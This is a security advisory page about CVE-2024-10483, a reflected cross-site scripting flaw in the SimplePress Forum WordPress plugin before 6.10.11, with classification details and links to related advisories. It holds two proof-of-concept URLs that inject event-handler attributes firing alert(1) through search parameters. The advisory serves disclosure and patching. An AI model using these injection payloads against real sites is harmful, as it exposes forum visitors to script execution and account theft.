SimplePress Forum < 6.10.11 – Reflected XSS | CVE 2024-10483 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting.

Proof of Concept

PoC 1:

/FORUMNAME/members/?ug=&msearch=g8eh2'%20onmouseover%3dalert(1)%20style%3dposition%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%20g394xktlt7p&membersearch=Search

PoC 2:

/FORUMNAME/?search=1&new=1&forum=all&value=kjhgjgbjbv3vy6'onfocus%3d'alert(1)'autofocus%3d'ln6zk&type=1&include=1

Please replace "FORUMNAME" in both PoCs to actual forum slug.

Affects Plugins

Fixed in 6.10.11

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Ryoma Yamada

Submitter

Ryoma Yamada

Verified

Yes

WPVDB ID

c7e3c473-09b2-473b-87d7-0a01d8f52086

Timeline

Publicly Published

2025-02-05 (about 10 months ago)

Added

2025-02-05 (about 10 months ago)

Last Updated

2025-02-05 (about 10 months ago)

Other

Published

Title

Published

2010-11-05

Title

Feedlist < 2.70.00 - XSS

Published

2024-06-12

Title

WPBakery Page Builder < 7.7 - Authenticated (Contributor+) Stored Cross-Site Scripting via VC Single Image link attribute

Published

2025-07-17

Title

Knowledge Base < 2.3.2 - Authenticated (Administrator+) Stored Cross-Site Scripting via Plugin Slug

Published

2025-08-14

Title

12 Step Meeting List < 3.18.4 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2021-12-27

Title

WP User Frontend < 3.5.26 - SQL Injection to Reflected Cross-Site Scripting